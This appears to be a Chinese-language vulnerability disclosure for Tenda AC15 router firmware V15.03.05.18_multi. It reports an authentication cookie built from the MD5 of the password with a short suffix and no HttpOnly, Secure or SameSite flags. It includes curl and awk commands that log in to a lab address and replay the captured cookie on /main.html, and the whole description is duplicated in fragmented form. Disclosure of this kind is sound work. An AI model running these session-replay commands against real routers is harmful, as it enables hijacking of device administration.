Tenda AC15 固件 V15.03.05.18_multi 以 password=<MD5(password)><6字符后缀> 的形式颁发认证 Cookie,并在没有 HttpOnly、Secure 或 SameSite 标志的情况下返回,从而将密码哈希暴露给客户端。
低熵后缀充当可预测的会话标识符,允许攻击者重放或劫持会话。
/login/Auth 颁发格式为 password=<MD5(password)><6字符后缀> 的 Cookie。HttpOnly、Secure、SameSite)。document.cookie)访问该 Cookie,并在请求 /main.html 时重用。PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly、Secure 和 SameSite 标志。Tenda AC15 固件 V15.03.05.18_multi 版本以 password=<MD5(password)><6字符后缀> 的形式颁发认证 Cookie,并在没有 HttpOnly、Secure、SameSite 标志的情况下返回,导致密码哈希暴露给客户端。
短熵后缀作为可预测的会话标识符,可实现会话重用或劫持。
/login/Auth 颁发格式为 password=<MD5(password)><6字符后缀> 的 Cookie。HttpOnly、Secure、SameSite 标志。document.cookie)读取 Cookie,并在请求 /main.html 时重用。PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly、Secure、SameSite 标志。